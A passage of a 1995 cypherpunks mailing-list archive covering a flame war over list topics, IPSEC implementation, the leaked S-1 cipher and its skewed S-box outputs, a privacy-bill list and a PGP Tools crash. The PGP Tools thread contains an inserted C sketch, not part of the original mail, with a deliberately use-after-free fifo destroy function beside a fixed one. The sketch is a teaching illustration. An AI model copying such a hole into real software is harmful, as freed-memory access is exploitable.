here in public, without of course the messages that preceded this (and
without my permission, needless to say).

Again, Perry is Perry.

People work on what interests them. It is nice for Perry, and maybe for all
of us if his efforts work out, that he has thrown himself into this new
programming project, but it is wrong for him to automatically dismiss the
interests and efforts of others.

There's also a certain "control freak" attitude that creeps into this list
(and other lists, of course) at times, wherein people say that their
current interest is vastly more important than anything else and that
anyone who does not drop their frivolous other interests and begin work
immediately on the One True Project are fools and knaves, and are probably
secretly working for the NSA! (:-}).

People should write about what interests them. Those who wish to program,
should program. Those who wish to explore number theory, should explore
number theory. And so on.

Attempting to control what gets posted on this list is pointless. If you
don't like a particular topic, or an author, use filters and kill files.
This can be done in many ways, including mail programs, procmail, and even
the "MailWeir" service that Harry Hawk offers. And many people dump the
list traffic into local newsgroups, allowing threadified reading. Also,
various digestified versions of the list exist--Eric Blossom has one.

Insulting people as "ciphergroupies" because they are not working on one's
current interest seems needlessly counterproductive.

Just my views. If you don't like 'em, ignore them or filter them. That's
the Cypherpunk way of doing things.

--Tim May


Special note: My ISP has changed its domain name from "sensemedia.net" to
"got.net" (as in "got milk?"), so I have to again ask you all to bear with
me and use my new e-mail address, "tcmay@got.net".
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May            | Crypto Anarchy: encryption, digital money,
tcmay@got.net (Got net?)  | anonymous networks, digital pseudonyms, zero
408-728-0152              | knowledge, reputations, information markets,
Corralitos, CA            | black markets, collapse of governments.
Higher Power: 2^756839    | Public Key: PGP and MailSafe available.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@panix.com>
Date: Thu, 10 Aug 95 09:19:10 PDT
To: cypherpunks@toad.com
Subject: where to get RFCs and internet drafts
Message-ID: <199508101619.MAA27815@panix2.panix.com>
MIME-Version: 1.0
Content-Type: text/plain



A couple of people have asked, so I'm posting...

RFCs and internet drafts are both available for anonymous FTP from
ds.internic.net.

Phil Karn's photuris stuff is still in the early draft phase. Help
speed up development by playing with it!

.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sdw@lig.net (Stephen D. Williams)
Date: Thu, 10 Aug 95 09:06:32 PDT
To: perry@piermont.com
Subject: Re: IPSEC goes to RFC
In-Reply-To: <199508101452.KAA24637@panix4.panix.com>
Message-ID: <m0sgafh-0009yuC@sdwsys>
MIME-Version: 1.0
Content-Type: text/plain



> Adam Shostack writes:
> > | IPSEC is now a Proposed Standard.
> > 
> > | Again, *we need your help*. Cypherpunks write code. Help us make the
> > | internet safe for personal privacy by contributing to this effort.
> > 
> > 	How about posting a list of 'things that need doing?'  I
> > assume one is floating around, possibly even with time estimates?
> 
> The IETF was challenged by Steve Crocker to be ready for use of IPSEC
> for the Dallas meeting in December so that no IETFer who wanted to
> communicate securely with his home site need be insecure.
> 
> To accomplish that, we need to produce versions of the security stack
> for many architectures. Right now, we have AIX and 4.4BSD fairly
> solidly covered. Less well covered is HPUX. People familiar with code

Could we please share snapshots of any code that exists?  Even if it's
for a totally different OS, it's still extremely helpful if we're short
on time.

> like the Trumpet Winsock stack, Linux, or who have access to the

I'm interested in doing/helping with Linux.  I also have access to
an SGI Indy (less well ready to develop though) and HPUX.

> innards of SunOS, Solaris, Windows 95, Mac stacks, and others, and can
> legitimately release implementations for those platforms, are probably
> needed. We need serious commitments from people but of course everyone
> is trying to help everyone else along.
> 
> Basically, if you know how to hack kernels and networking code and you
> have a platform you can work on, we need you.
> 
> We also lack work on the key management end of things -- people who
> can start playing around with implementing Photuris, even on a "toy"
> basis, would probably be of help.
> 
> Perry

Does it make any sense to talk about loopback interface style wedges to
convert OS native IP to IPSEC?  What about a version of inetd that
wraps apps?

(I'm about to read the RFC's, so not sure if those suggestions make sense
yet.)

I really like the idea of using DNS for (public I assume) keys...

sdw
-- 
Stephen D. Williams 25Feb1965 VW,OH (FBI ID) sdw@lig.net http://www.lig.net/sdw
Consultant, Vienna,VA Mar95- 703-918-1491W 43392 Wayside Cir.,Ashburn, VA 22011
OO/Unix/Comm/NN       ICBM/GPS: 39 02 37N, 77 29 16W home, 38 54 04N, 77 15 56W
Pres.: Concinnous Consulting,Inc.;SDW Systems;Local Internet Gateway Co.;28May95



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: danisch@ira.uka.de (Hadmut Danisch)
Date: Thu, 10 Aug 95 04:40:26 PDT
To: cypherpunks@toad.com
Subject: Re: "S1" encryption system (was: this looked like it might be interesting)
Message-ID: <9508101139.AA27386@elysion.iaks.ira.uka.de>
MIME-Version: 1.0
Content-Type: text/plain


> BTW, the code has been posted to Usenet by a Frank Falstaff -- look for
> message ID <40b8tk$cj4@news.xs4all.nl> in sci.crypt (Wed, Aug. 9, 1995).
> His article refers to a message ID (namely <40b50l$oa8@utopia.hacktic.nl>)
> that differs from the message ID of the copy sent to c'punks. So it looks
> like there was at least one additional recipient. That's a minimum of 5
> originals so far....

It has been posted twice to sci.crypt, once from "Frank Falstaff", and
once through the remailer@utopia.hacktic.nl.  sci.crypt seems to have been
one of the recipients...


Hadmut




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andy Brown <asb@nexor.co.uk>
Date: Thu, 10 Aug 95 05:48:09 PDT
To: cypherpunks@toad.com
Subject: Why DES in IPSEC ESP?
Message-ID: <Pine.SOL.3.91.950810133448.4480H-100000@eagle.nexor.co.uk>
MIME-Version: 1.0
Content-Type: text/plain


I suppose this is really addressed at Perry:

Why was (single) DES chosen as the algorithm for the ESP part of IPSEC? 
If someone's IP traffic is being monitored and collected offline by some
agency then they're going to get about a couple of hours of security while
the special purpose key search hardware kicks into action.  I know other
algorithms can optionally be used, but surely it would have been better to
have a second, stronger algorithm specified mandatory as well. 


- Andy

+-------------------------------------------------------------------------+
| Andrew Brown  Internet <asb@nexor.co.uk>  Telephone +44 115 952 0585    |
| PGP (2048/9611055D): 69 AA EF 72 80 7A 63 3A  C0 1F 9F 66 64 02 4C 88   |
+-------------------------------------------------------------------------+





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Neal <dneal@usis.com>
Date: Thu, 10 Aug 95 11:53:21 PDT
To: "Stephen D. Williams" <sdw@lig.net>
Subject: Re: IPSEC goes to RFC
In-Reply-To: <m0sgafh-0009yuC@sdwsys>
Message-ID: <Pine.BSI.3.91.950810134314.7478B-100000@usis.com>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 10 Aug 1995, Stephen D. Williams wrote:

> 
> > Adam Shostack writes:
> > > | IPSEC is now a Proposed Standard.
> > > 
> > > | Again, *we need your help*. Cypherpunks write code. Help us make the
> > > | internet safe for personal privacy by contributing to this effort.
> > > 
> > > 	How about posting a list of 'things that need doing?'  I
> > > assume one is floating around, possibly even with time estimates?
> > 
> 
> Could we please share snapshots of any code that exists?  Even if it's
> for a totally different OS, it's still extremely helpful if we're short
> on time.
> 
> > like the Trumpet Winsock stack, Linux, or who have access to the
> 
> I'm interested in doing/helping with Linux.  I also have access to
> an SGI Indy (less well ready to develop though) and HPUX.


I'd like to also volunteer to do the linux port, whether it be
coordination patches, hacking code, finding people, whatever.


Also, if other cypherpunk subscribers feel that this topic
is inappropriate for the list (not likely) or that it would
generate too much traffic for the list (?) I can create a new
majordomo list dedicated to the effort in 10 minutes.

The aforementioned 'To Do List' could be the signup message
you get when joining the list.

Just a suggestion,
David.


David Neal <dneal@usis.com> - GNU Planet Aerospace 1-800-PLN-8-GNU
Unix, Sybase and Networking consultant. "...you have a personal responsibility 
to be pro-active in the defense of your own civil liberties." - S. McCandlish





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Thu, 10 Aug 95 10:58:08 PDT
To: cypherpunks@toad.com
Subject: Conspiracies
Message-ID: <199508101757.NAA25579@pipe2.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   I respect the view that sound crypto requires skeptical
   review and testing outside closed rooms. Conspiracies live
   or die by the same process. Crypto would die if there was
   no belief in conspiracies.

   Conspiracy theory drives the cypherpunk agenda, I surmised
   from the welcoming statement. Note the caution about "S1,"
   and any other crypto offering.

   Perry's sharp statements on the urgent need for crypto
   deployment are motivated, it seems to me, by a view of a
   believable, if not wholly proveable, threat that crypto is
   believed to counter. I choose to believe him; Orlin's got my
   skeptical interest -- put up or shut up -- and he's not out
   of line.

   But who knows more than what we read in the conspiracy-
   driven media and hear from our respected leaders?

   Take your pick of them, or believe your own home-grown,
   they're unavoidable, on cypherpunks or elsewhere -- they're
   the crippling religion of the ages.

   My mouth waters to hear the latest conspiracies about
   cypherpunks' evil spread of demon crypto.












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Rev. Mark Grant" <mark@unicorn.com>
Date: Thu, 10 Aug 95 06:15:34 PDT
To: cypherpunks@toad.com
Subject: PGP Tools on Linux
Message-ID: <Pine.3.89.9508101424.A20107-0100000@unicorn.com>
MIME-Version: 1.0
Content-Type: text/plain



Did anyone ever get PGP Tools working on Linux ? I can compile it, but it 
has a marked tendency to get SEGVs when destroying fifos...

	Mark





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Derek Atkins <warlord@ATHENA.MIT.EDU>
Date: Thu, 10 Aug 95 11:45:51 PDT
To: "Rev. Mark Grant" <mark@unicorn.com>
Subject: Re: PGP Tools on Linux
In-Reply-To: <Pine.3.89.9508101424.A20107-0100000@unicorn.com>
Message-ID: <199508101842.OAA22544@charon.MIT.EDU>
MIME-Version: 1.0
Content-Type: text/plain


> Did anyone ever get PGP Tools working on Linux ? I can compile it, but it 
> has a marked tendency to get SEGVs when destroying fifos...

Yea, I did a long time ago.  There was a bug in the code that caused
destroying fifos to do this -- it would free the fifo and then try to
set it, or something like that.  You have to reorder a few commands to
fix the problem.

I've not looked at PGPTools in a long time, so I can't give you any
more detailed information.

-derek
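
The ordering bug described in the reply above (free the fifo, then write to it) is a use-after-free. The sketch below is an added illustration, not PGP Tools code and not part of the original message: `struct fifo`, `fifo_put`, `fifo_destroy_buggy` and `fifo_destroy` are hypothetical names for a minimal block-list fifo, showing the faulty order beside the reordered one.

```c
#include <stdlib.h>
#include <string.h>

#define BLOCK_SIZE 16

/* Hypothetical block-list fifo for illustration; not PGP Tools' structure. */
struct block {
    struct block *next;
    size_t used;
    unsigned char data[BLOCK_SIZE];
};

struct fifo {
    struct block *head;   /* oldest block (read side) */
    struct block *tail;   /* newest block (write side) */
    size_t length;        /* total bytes queued */
};

struct fifo *fifo_create(void)
{
    return calloc(1, sizeof(struct fifo));
}

/* Append len bytes, allocating blocks as needed. Returns 0 on success. */
int fifo_put(struct fifo *f, const void *src, size_t len)
{
    const unsigned char *p = src;
    while (len > 0) {
        if (f->tail == NULL || f->tail->used == BLOCK_SIZE) {
            struct block *b = calloc(1, sizeof(*b));
            if (b == NULL)
                return -1;
            if (f->tail != NULL)
                f->tail->next = b;
            else
                f->head = b;
            f->tail = b;
        }
        size_t room = BLOCK_SIZE - f->tail->used;
        size_t n = len < room ? len : room;
        memcpy(f->tail->data + f->tail->used, p, n);
        f->tail->used += n;
        f->length += n;
        p += n;
        len -= n;
    }
    return 0;
}

#ifdef FIFO_SHOW_BUGGY_ORDER   /* left out of the default build on purpose */
/* Faulty order: memory is released first and touched afterwards. Each marked
 * line is undefined behaviour; a crash depends on what the allocator does. */
void fifo_destroy_buggy(struct fifo *f)
{
    struct block *b = f->head;
    free(f);
    while (b != NULL) {
        free(b);
        b = b->next;               /* read after free */
    }
    f->head = f->tail = NULL;      /* write after free */
    f->length = 0;                 /* write after free */
}
#endif

/* Reordered: save each link before freeing its block, reset the header
 * while it is still allocated, and free the header last. Clears the
 * caller's pointer so a repeated call is a no-op. Returns blocks released. */
size_t fifo_destroy(struct fifo **fp)
{
    size_t freed = 0;
    if (fp == NULL || *fp == NULL)
        return 0;
    struct fifo *f = *fp;
    struct block *b = f->head;
    while (b != NULL) {
        struct block *next = b->next;   /* read the link while b is valid */
        free(b);
        freed++;
        b = next;
    }
    f->head = f->tail = NULL;           /* the "set" step, moved before free */
    f->length = 0;
    free(f);
    *fp = NULL;
    return freed;
}

int main(void)
{
    struct fifo *f = fifo_create();
    /* Constructed sample input: 40 bytes, so three 16-byte blocks. */
    if (f == NULL || fifo_put(f, "constructed sample input, 40 bytes long.", 40))
        return 1;
    return (fifo_destroy(&f) == 3 && f == NULL) ? 0 : 1;
}
```

Building with `-DFIFO_SHOW_BUGGY_ORDER` compiles the faulty variant so it can be run under a memory checker; the default build contains only the reordered one.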





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "J. Kent Hastings" <zeus@pinsight.com>
Date: Thu, 10 Aug 95 15:12:26 PDT
To: "cypherpunks@toad.com>
Subject: Legislative One-Liners
Message-ID: <199508102212.PAA01472@utopia.pinsight.com>
MIME-Version: 1.0
Content-Type: text/plain


-- [ From: J. Kent Hastings * EMC.Ver #2.5.02 ] --

-----BEGIN PGP SIGNED MESSAGE-----

DANGER: Legislature In Session! 

"One-Liners" List of 104th Congress privacy legislation. 
Latest update: 8/1/95.

The overview compiled by the Electronic Privacy Information Center 
(EPIC), info@epic.org, http://www.epic.org is edited here into single 
line entries by J. Kent Hastings, zeus@pinsight.com, Assistant Director 
of the Agorist Institute, http://www.pinsight.com/~zeus/agorist/

The full text of pending bills, and other legislative materials is 
available from cpsr.org /cpsr/privacy/epic/104th_congress_bills/

- -- House Bills -- 

Taking Back Our Streets (HR 3). Limits sanctions for illegal searches. 
Personal Responsibility (HR 4). Databases of new hires and child support. 
Risk Assessment (HR 9). Government Information Locator Service (GILS).
FBI Counterintelligence (HR 68). Easier access to credit reports by FBI. 
Electronic Anti-Stalking (HR 112). Electronic harassing a federal crime. 
Obscenity and Computers (HR 121). Network obscenity 10-year fed penalty.
Quality Assurance in Drug Testing (HR 153). Requirements for drug testing.
Individual Privacy Protection (HR 184). New national privacy commission. 
Interstate Child Support (HR 195). New hires database, IRS collection.
Export Administration (HR 361). Studies software encryption overseas. 
Antitrust Reform (HR 411). Orders FCC privacy survey, limits CPNI.
Postal Privacy (HR 434). Prohibits P.O. selling info to direct marketers. 
Fair Health Information Practices (HR 435). Health care privacy bill.
Restricted Explosives Control (HR 488). Federal permits, even black powder.
Social Security Anti-Fraud (HR 502). Telephone verification of applicants.
Immigration Reform (HR 560). Tamperproof ID cards for immigrants.
Consumer Reporting Reform (HR 561). Limits cost and use of credit reports.
Enforce Employer Sanctions (HR 570). SS card w/fingerprint, barcode, photo. 
Exclusionary Rule Reform (HR 666). Violates 4th Amendment, except IRS/BATF. 
Criminal Alien Deportation (HR 668). Wiretaps OK for illegal immigration.  
Illegal Immigration Control (HR 756). Wiretaps, machine SSN I.D., databases.

Child Support Responsibility (HR 785). Parents SSN birth/marriage documents.
Paperwork Reduction (HR 830). Coordinates federal information policy.
Comprehensive Antiterrorism (HR 896). "Terrorist organization" fund raising.
Child Support Enforcement (HR 906). Allows access to all financial records. 
Communications Decency Act (HR 1004). Same as Exon bill in Senate (S 314).
Illegal Immigration Control (HR 1018). Tamper proof Social Security cards.
Welfare Transformation (HR 1157). Database of new employees, parent locator.
American Health Security (HR 1200). Health records database for research.
Food Stamp Simplification (HR 1214). Increases SSN use. Electronic benefits.
Basic Health Care (HR 1234). Weak limits on medical information access.
Sexual Crimes Against Children (HR 1240). New penalties, computer networks.
DNA Identification (HR 1241). Revises funding authorized for Violent Crime. 
Family Stability (HR 1250). Database of employees, parents, more SSN use. 
Family Privacy Protection (HR 1271). Prohibits questionnaires of minors.
Revise Aliens and Nationality laws (HR 1292). Employment verification card.
Children's Media Protection (HR 1390). "V-Chip" TV filtering, ratings.
Communications Act of 1995 (HR 1555). Privacy of customer info, except CDA.
Antiterrorism Amendments (HR 1635). Eases wiretaps, credit report evidence.
Quality Assurance in Drug Testing (HR 1706). Standards for drug testing.
Comprehensive Antiterrorism (HR 1710). Eases wiretaps, credit evidence.
Constitutional Rights Oversight (HR 1738). Creates inspector general review.
Prevent Fraud in Health Care (HR 1758). Sharing of medical information.
Health Information Modernization (HR 1766). Health Information Network.
Counterterrorism Research (HR 1847). New DOJ surveillance and tracking.
High Risk Drivers (HR 1866). SSN as common identifier for drivers liscenses.
Health Care and Paperwork Reduction (HR 1912). Magnetic ID, SSN/health plan.
Immigration in the National Interest (HR 1915). More wiretaps, bank records.
Internet Freedom and Family Empowerment (HR 1978). On-line srvc screening.
Parental Control Inappropriate Programming(-ed.) (HR 2030). Another V-Chip.

  --  Senate Bills -- 

Violent Crime Control (S 3). OK's illegal search, wiretaps by foreign govts.
Family Health Insurance Protection (S 7). Democratic health care bill.
Exclusionary Rule Limitation (S 54). OK's violations of 4th Amendment.
Paperwork Reduction Act (S 244). Government Information Locator Svc (GILS).
Immigrant Control (S 269). National registry for workplace verification.
Private Long-Term Care (S 294). Creates "health information network".
Communications Decency Act (S 314). Outlaws sexual and anonymous messages.
High-risk Drivers Act (S 387). National system of driving records, uses SSN.
Marking of Plastic Explosives (S 390). Wiretaps terror "material support."
Interstate Child Support (S 456). Databank of new hires, SSA link.
Illegal Immigration Control (S 580). Wiretaps immigration and smuggling.
Child Custody Reform (S 632). Database of all child custody cases.
Telecommunications Competition (S 652). Restricts indecent Internet speech.
Taxpayer Browsing Protection (S 670). Stops unauthorized tax data viewing.
Child Support (S 687). Support obligation database. SSNs related documents.
Amend Fair Credit Reporting (S 709). Limits employment credit reports.
Study of Internet Pornography (S 714). Replacement for Comm Decency (S.314).
Comprehensive Terrorism (S 735). "Roving" wiretaps, Internet bomb info.
Economic Opportunity (S 746). Expands National Parent Locator Service.
Immigration Enforcement (S 754). Telephone verification for applicant SSNs.
Illegal Immigration (S 759). Database non-immigrants' entrance/exit dates.
Omnibus Counterterrorism (S 761). Pays for Digital Telephony and wiretaps.
Interstate Child Support (S 828). Both parents' SSNs birth/marriage/driver.
Real Welfare Reform (S 834). "Designated industries" support obligations.
Work and Gainful Employment (S 840). Child support, new hire, SSN documents.
Health Information Modernization (S 872). National health info network.
Protection of Children (S 892). Criminalizes indecent computer data.
Intelligence Authorization (S 922). Credit info, FBI "counterintelligence."
Interstate Child Support (S 926). Database of W-4 forms and child support.
Healthy Mothers, Healthy Children (S 933). Children's immunization database.
Information Technology Management (S 946). Chief Information Officer of OMB.
Anti-Electronic Racketeering (S 974). Bans encryption software distribution.
National Information Infrastructure (S 982) Newly defined computer crimes.
Illegal Immigration Control (S 999). Internal passport for all citizens.

- --- End of Listing ---

   ANNOUNCING: The "MIND YOUR 0WN BUSINESS" audiotext program. 
          1 - 9 0 0 - C A N - M Y 0 B  (1-900-226-6902)
            Notice the zero digit, not the letter "O."

       The Feds say you can't have privacy, but we say you 
                  CAN "Mind Your 0wn Business!" 

And now we have a 900 number to reveal new methods to defend your privacy 
from criminals and tyrants. Sponsored by The Agorist Institute.

The cost of each call is just 99 cents per minute, average cost $2.97, 
average length 3 minutes (August 1995 only. Future messages will be longer.)
You must be at least 18 to call or have parental permission. This is a much 
better deal than you'll get from most psychic or sex lines ;^)

The line will be updated by the 1st of each month. By September 1, 1995, 
our message will be recorded by a professional audio producer, but for now, 
you get to hear me read the first script. Don't be surprised if we update 
it during August.

	Kent

J. Kent Hastings, Assistant Director of The Agorist Institute 
zeus@pinsight.com -- http://www.pinsight.com/~zeus/agorist/
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMCqAeDTxxI221vktAQEaTAQAitl0r9d6nii64lfdIszWvnePURR0ti9h
JsL3pMk+CYwz3CweuVvCXXJKp3TX6P+hkL6kdjt2zJ6axQFAfRcLcl6BqpQcxI7p
MnHQbkLFQgI/4t9nM3RxieX5/a4idYtEAZuZh+y3ca160ftxCFLUaP6kordg/KI2
YgvAqrljkOA=
=SQWP
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alex de Joode <usura@replay.com>
Date: Thu, 10 Aug 95 06:41:16 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: "S1" encryption system (was: this looked like it might be interesting)
Message-ID: <199508101341.AA07297@xs1.xs4all.nl>
MIME-Version: 1.0
Content-Type: text/plain


Futplex sez:

: BTW, the code has been posted to Usenet by a Frank Falstaff -- look for
: message ID <40b8tk$cj4@news.xs4all.nl> in sci.crypt (Wed, Aug. 9, 1995).
: His article refers to a message ID (namely <40b50l$oa8@utopia.hacktic.nl>)
: that differs from the message ID of the copy sent to c'punks. So it looks
: like there was at least one additional recipient. That's a minimum of 5
: originals so far....

The remailers at utopia.hacktic.nl use news.xs4all.nl as their 
newsserver, all messages get a "news.xs4all.nl-ID", all mail
IDs will have "utopia.hacktic.nl" in them.

--
Alex de Joode
Fear Uncertainty and Doubt, Inc.				




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@panix.com>
Date: Thu, 10 Aug 95 12:43:49 PDT
To: tcmay@got.net (Timothy C. May)
Subject: Re: Conspiracies and "Ciphergroupies"
In-Reply-To: <ac4f9f9703021004675d@[205.199.118.202]>
Message-ID: <199508101943.PAA27611@panix4.panix.com>
MIME-Version: 1.0
Content-Type: text/plain



This is only of interest to a very limited number of people. It's
basically a flame about private matters. I discourage reading it.

Timothy C. May writes:
> Ironically, just a few weeks ago, Perry was sharply criticizing me for my
> "Crisis Overload" post and was urging me to join him in a serious lobbying
> effort to undermine the Grassley bill.

You are rewriting history. I just asked you if you thought that hiring
a Washington lobbying firm would be a good idea. I didn't urge you to
join anything. I had no intention of involving any of us personally
in any lobbying on the basis that professionals would do it better.

> I declined,

Actually, you were noncommittal.

> thinking it unlikely to succeed and preferring to concentrate on my
> other project (including a new release of SmalltalkAgents, just
> arrived). When I preferred to work on more technical things than
> launching a grassroots political campaign, he got abusive and
> insulting in e-mail and I told him I would no longer accept this
> sort of abuse.

Actually Tim, this is again a rewrite of history. I was having a
perfectly pleasant email conversation with you (the first in a while)
when your tax situation came up and I advised you that you ought to
get some professional tax people to look at your finances. I won't
mention what the situation was since that was private, but if you
insist I'll happily post our exchange. You claimed I was being
"abusive" and went off in a huff. I don't recall urging you to do
anything other than seeing a professional tax attorney.

I just checked my archive of our private mail exchange on the subject,
and it appears that my recollection is substantially accurate. As I
noted, if you insist, I'll happily post the private mail.

As for your activities: frankly, Tim, I haven't known you to do much
of anything over the years. This is, of course, your right. You've
earned your money and you now get to do whatever you like. Don't
claim, however, that I said or did things that I did not say or do.

> Insulting people as "ciphergroupies" because they are not working on one's
> current interest seems needlessly counterproductive.

If you'd read my messages, I listed a wide array of productive
activities. Merely because I feel that polluting the list with
messages about Vincent Foster's shoe size is a waste doesn't mean that
I think everyone has to be a clone. There are dozens of valuable
activities from lobbying to coding to spreading the word that people
can do. However, posting conspiracy theories isn't in the list.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Censored Girls Anonymous <carolab@censored.org>
Date: Thu, 10 Aug 95 14:16:08 PDT
To: cypherpunks@toad.com
Subject: Re: Conspiracies and "Ciphergroupies"
In-Reply-To: <ac4f9f9703021004675d@[205.199.118.202]>
Message-ID: <Pine.BSI.3.91.950810155403.14661A-100000@usr2.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


Perry works too hard sometimes.
Tim writes kewl articles.
Mr. Young keeps us up to date on the Times.
Wei Dai has RSA on his case, in unwarranted fashion.
Alex gets it all across the water.
Brad is hung up on Vince Foster.
Lucky Green needs his antique tin.
Futplex has a cool name, and hot pointers.
Joel lives in his own 'Private Idaho'.
Robert now "Pinesigns" everything.

And today my web counter showed that over 1,000 folks had now used
my web page to get PGP. This includes over 300 shipped 'across the
dreaded water zones'. (sound of 1 hand clapping!)

I write code....html, that is......
I do attempt to use it judiciously.

censored.org censors no one. Just quietly enters
things to the unread mail stack (now 11.3 megs)
for a rainy day.

Have a fun summer...fall is coming soon, and light
a candle for Jerry Garcia today.

Love Always,

Carol Anne

Member Internet Society - Certified BETSI Programmer - WWW Page Creation
-------------------------------------------------------------------------
Carol Anne Braddock         <--now running linux 1.0.9 for your pleasure
carolann@censored.org             __  __     ____  ___       ___ ____
carolab@primenet.com             /__)/__) / / / / /_  /\  / /_    /
carolb@spring.com               /   / \  / / / / /__ /  \/ /___  /
-------------------------------------------------------------------------
A great place to start
My Cyber Doc...





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Thu, 10 Aug 95 16:35:36 PDT
To: tcmay@got.net (Timothy C. May)
Subject: Re: Crypto = Competitive Advantage?
In-Reply-To: <ac4e530c13021004688c@[205.199.118.202]>
Message-ID: <199508102330.QAA01345@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


> 
> It seems that anything involving the Internet, the Web, and digital
> commerce is really, really hot.

	The fire that burns twice as hot burns half as long. It may be
a cliche but it is quite applicable here I think.

-- 
sameer						Voice:   510-601-9777
Network Administrator				Pager:	 510-321-1014
Community ConneXion: The NEXUS-Berkeley		Dialin:  510-658-6376
http://www.c2.org (or login as "guest")			sameer@c2.org



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Thu, 10 Aug 95 17:29:48 PDT
To: Anonymous <nowhere@bsu-cs.bsu.edu>
Subject: Re: your mail
In-Reply-To: <199508102329.SAA21100@bsu-cs.bsu.edu>
Message-ID: <Pine.SUN.3.91.950810163906.19605B-100000@crl10.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

On Thu, 10 Aug 1995, Anonymous wrote:

> will someone just CUT THE @#$%^&* FOSTER CONSPIRACY THEORIES??
> I'm getting F---ING SICK AND TIRED of all the BULL**** [etc.]

> PARRY IS RIGHT. everyone else who disagrees can KISS MY ASS.

I, for one, am anxious to kiss Anonymous' ass.  Unfortunately,
he forgot to take credit for his clever bon mot, so I am unable
to comply.  What a pity.


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matt Blaze <mab@crypto.com>
Date: Thu, 10 Aug 95 13:35:24 PDT
To: cypherpunks@toad.com
Subject: More "S-1" foolishness
Message-ID: <199508102043.QAA17280@crypto.com>
MIME-Version: 1.0
Content-Type: text/plain


Yesterday I mentioned that I'd noticed that "S-1" has a non-uniform
distribution of F (Sbox?) outputs - some values appear far more often
than others.  This means that some values are more likely to be XORed
against the cleartext than others.  Needless to say, this is a very
unusual (and presumably very bad) property - in DES, for example, the
Sbox outputs are completely flat.

I've been avoiding real work today, so here's a breakdown of the
distribution of output values for F0-F3 by value and by bit
position, as well as the total for all four.  (The expected numbers are
16 for the outputs by value and 128 for the outputs by bit).

If I get more time, I'll try to figure out how to structure a
differential attack (which will be a little bit tricky given the
G function).  I'm not sure this is worth putting much effort
into, however, given that the closer I look the more hoax-like this
seems.  Much as I'd like to think this is a version of Skipjack, it's
getting pretty hard to suspend disbelief.  I might be willing to
believe, however, that this is some kind of proprietary industrial
cipher; perhaps the poster added the "TOP SECRET" stuff to attract
additional attention to it.

All in all, this is a most unusual cipher.  On the surface at least,
it has many elements of a really bad design.  On the other hand, some
of the other ideas are novel enough that I wonder why its inventors
wouldn't want to be associated with them.

-matt


---F0 output distribution---
F0:0 = 18 (1.12) ******************
F0:1 = 10 (0.62) **********
F0:2 = 17 (1.06) *****************
F0:3 = 15 (0.94) ***************
F0:4 = 13 (0.81) *************
F0:5 = 12 (0.75) ************
F0:6 = 18 (1.12) ******************
F0:7 = 14 (0.88) **************
F0:8 = 17 (1.06) *****************
F0:9 = 18 (1.12) ******************
F0:a = 14 (0.88) **************
F0:b = 17 (1.06) *****************
F0:c = 18 (1.12) ******************
F0:d = 12 (0.75) ************
F0:e = 19 (1.19) *******************
F0:f = 24 (1.50) ************************
---by bit---
F0:1 = 122 (0.95) ***************
F0:2 = 138 (1.08) *****************
F0:4 = 130 (1.02) ****************
F0:8 = 139 (1.09) *****************

---F1 output distribution---
F1:0 = 21 (1.31) *********************
F1:1 = 13 (0.81) *************
F1:2 = 15 (0.94) ***************
F1:3 = 20 (1.25) ********************
F1:4 = 22 (1.38) **********************
F1:5 = 15 (0.94) ***************
F1:6 =  8 (0.50) ********
F1:7 = 22 (1.38) **********************
F1:8 = 19 (1.19) *******************
F1:9 = 18 (1.12) ******************
F1:a = 15 (0.94) ***************
F1:b = 13 (0.81) *************
F1:c = 10 (0.62) **********
F1:d = 12 (0.75) ************
F1:e =  9 (0.56) *********
F1:f = 24 (1.50) ************************
---by bit---
F1:1 = 137 (1.07) *****************
F1:2 = 126 (0.98) ***************
F1:4 = 122 (0.95) ***************
F1:8 = 120 (0.94) ***************

---F2 output distribution---
F2:0 = 16 (1.00) ****************
F2:1 = 13 (0.81) *************
F2:2 = 16 (1.00) ****************
F2:3 = 13 (0.81) *************
F2:4 = 12 (0.75) ************
F2:5 = 17 (1.06) *****************
F2:6 = 16 (1.00) ****************
F2:7 = 16 (1.00) ****************
F2:8 = 14 (0.88) **************
F2:9 = 22 (1.38) **********************
F2:a = 27 (1.69) ***************************
F2:b = 19 (1.19) *******************
F2:c = 14 (0.88) **************
F2:d = 16 (1.00) ****************
F2:e = 11 (0.69) ***********
F2:f = 14 (0.88) **************
---by bit---
F2:1 = 130 (1.02) ****************
F2:2 = 132 (1.03) ****************
F2:4 = 116 (0.91) **************
